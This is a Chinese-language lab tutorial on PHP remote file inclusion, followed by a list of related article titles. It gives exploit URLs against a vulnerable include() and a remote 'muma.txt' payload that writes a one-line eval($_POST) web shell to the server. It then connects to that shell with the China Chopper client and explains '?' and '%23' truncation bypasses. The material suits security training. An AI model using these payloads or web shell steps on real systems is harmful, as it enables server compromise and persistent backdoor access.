遠端檔案包含shell
一
預備知識
程式開發人員通常會把可重複使用的函式寫到單個檔案中,在使用某些函式時,直接呼叫此檔案,無須再次編寫,這種呼叫檔案的過程稱為包含。
實驗目的
遠端檔案包含shell
實驗工具
火狐瀏覽器菜刀軟體工具
實驗環境
客戶機一臺(作業系統為Windows Server 2003)伺服器一臺(作業系統為Windows Server 2003)
實驗步驟
1、訪問127.0.0.1/FI/PHP_FI.php?filename=RFI.txt,網頁顯示是遠端檔案包含漏洞。
2、訪問網址127.0.0.1/yi.txt,可以看到可以訪問的木馬。
3.訪問127.0.0.1/FI/PHP_FI.php?filename=http://127.0.0.1/yi.txt會在當前目錄生成一句話木馬a.php
3、開啟桌面的【實驗工具】資料夾,雙擊開啟【中國菜刀】資料夾,找到【中國菜刀.exe】,雙擊開啟。
利用遠端檔案漏洞用菜刀連線,空白處右擊選擇【新增】。
地址處填寫http://127.0.0.1/FI/a.php。新增完畢,雙擊新新增的記錄進行執行
二
1.本機上2.php的程式碼如下
<?php
$sj=$_GET['sj'];
include($sj);
?>
假如我們不能上傳檔案,又想拿到shell,我們ke'y可以先寫一個muma.txt,內容如下:
<?php
$a = "<?php eval(\$_POST['123'])?>";
$b = fopen("a.php","w") or die("123!");
fwrite($b,$a);
fclose($b);
?>
訪問http://ip1/2.php?sj=http://ip2/muma.txt
上菜刀
2(繞過方式).本機上2.php的程式碼如下
<?php
$sj=$_GET['sj'];
include($sj.".html");
?>
muma.txt如上
訪問http://ip1/2.php?sj=http://ip2/muma.txt?
上菜刀
繞過方式分為(1.?繞過 2.#繞過%23)
相關文章
- Shell 檔案包含
- shell基礎教程二十四: shell基礎教程: Shell檔案包含
- Linux Shell檔案之間的包含關係Linux
- 如何在 Linux shell 中找出所有包含指定文字的檔案Linux
- 檔案包含漏洞(本地包含配合檔案上傳)
- 檔案包含之包含了Linux檔案描述符Linux
- 檔案包含2
- CTFer——檔案包含
- 什麼是檔案包含漏洞?檔案包含漏洞分類!
- 遠端登入和複製檔案
- 怎麼遠端傳輸大檔案?
- 遠端檔案管理系統(SpringBoot + Vue)Spring BootVue
- PHP檔案包含 整理PHP
- rsync udr——遠端大檔案傳輸加速
- 智慧小程式檔案館——遠端除錯除錯
- powershell 關閉遠端開啟的檔案
- PHP基礎---檔案包含PHP
- 檔案包含漏洞小結
- 本地檔案包含之包含日誌獲取webshellWebshell
- 如何使用scp進行遠端複製檔案?
- 程式碼安全之檔案包含
- 檔案包含之/proc/self/environ
- Apache Tomcat檔案包含漏洞分析ApacheTomcat
- ClickOnce釋出包含某檔案
- "白話"PHP檔案包含漏洞PHP
- PHP檔案包含小總結PHP
- 智慧小程式檔案館——再談遠端除錯除錯
- python程式碼讀取遠端檔案的方法--paramikoPython
- 遠端備份資料庫和檔案的方法資料庫
- 使用SSHFS檔案系統遠端掛載目錄
- git上傳到遠端有部分檔案未上傳Git
- 檔案包含漏洞(繞過姿勢)
- 檔案包含之銘感目錄
- 利用pearcmd實現裸檔案包含
- C語言 - 標頭檔案包含C語言
- 實戰篇——檔案包含漏洞一
- Shell指令碼 | 抓取log檔案指令碼
- 檔案包含-基於Pikachu的學習